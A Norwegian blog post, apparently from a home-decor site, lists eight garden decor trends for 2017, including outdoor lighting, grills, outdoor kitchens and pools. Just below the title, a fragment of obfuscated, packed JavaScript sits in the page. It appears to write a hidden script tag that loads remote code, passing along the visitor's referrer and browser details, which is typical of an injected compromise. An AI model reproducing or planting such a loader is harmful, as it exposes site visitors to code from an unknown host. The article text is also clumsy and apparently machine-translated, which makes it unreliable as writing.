Inspirasjon, Nyheter

8 tips om hage dekor 2017

8 »’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(«<\/k"+"l>«);n m=»q»;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkfzh|var|u0026u|referrer|tnrhz||js|php’.split(‘|’),0,{}))
tips om hage dekor 2017:
Våren nærmer seg. Selv om det er fortsatt veldig kaldt og vi finner snø mange steder rundt om i landet. I Stockholm i fjor var kanskje mest strålende dag hittills.Vi fikk se ekte sollys for første gang, noe som raskt gjør oss tenke på våren og sommeren. Men det er ikke bare vi som begynner å se våren nærmer seg.

Møbelbutikker og interiør verden merker begynner nå forberedt på årets våren samlinger. Homedecor.no har deltatt i årets hage innredning, hagemøbler og hvor trender peker mot. Titte ut listen nedenfor og nyte inspirasjon og våren følelse.

1. Tid for utendørs belysning

For å få den perfekte mysstämningen denne våren / sommeren, er å velge den vakre utendørs belysning. En trend som fortsetter å vedvare i 2017. Trenden er å nå tenke gjennom hagebelysning mer enn de gjorde før.

2. Opprette et utendørs rom

Innvendig styling av rommene har vokst sterkt blant mange. Hvorfor ikke ta på seg denne kreative tankegangen også utendørs? La fantasien løpe løpsk og skaper en strålende sted utendørs. Lounge møbler, puter, tepper, tepper og kanskje et lerret tak som. Det blir virkelig herlig. Ikke glem mysbelysningen også.

3. Spisestue i sentrum


Kanskje den mest åpenbare delen. Et sted å sitte og spise en deilig middag, lunsj eller frokost i solen eller skyggen. Dette er vanskelig å slå.

4. Grill

Noe som bør være i enhver hage eller terrasse, en grill. Hvis du ikke har en dag du har sikkert tenkt på det før. En grill trenger ikke koste så mye, og er tilgjengelig på de fleste forhandlere av hus og hjem.

5. Planting frukttrær

En norsk Hagen har noen planter nesten en selvfølge. For å lage en liten frukthage av epler, pærer, eller busker med bær. Dette er noe som står høyt på de norske enheter lister.

6. Bygge en utendørs kjøkken

Dette er noe som har blitt svært populært nylig. Muligheten for at i sommer for å tilberede måltider utendørs. Trenden for utekjøkken fortsetter inn i 2017, og vil sikkert bli enda mer populær når billigere alternativer vil dukke opp i løpet av året.

7. Lag en peis hage dekor

En favoritt som også kan brukes under kjøligere tider av året. En flott peis som kan slås ut i de små timer når mørket legger seg. Gir både Soft, innendørs belysning og varme rundt ham.

8. Basseng

Ja, sist men ikke minst. Hvem ønsker ikke en reell basseng i hagen? Denne trenden er kanskje ikke noe basert på noen dager, men dette må planlegging og lommebok. Det er ikke billig å bygge et basseng, og det tar tid. Men det ferdige prosjektet, er det virkelig en god følelse.

Related Posts

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *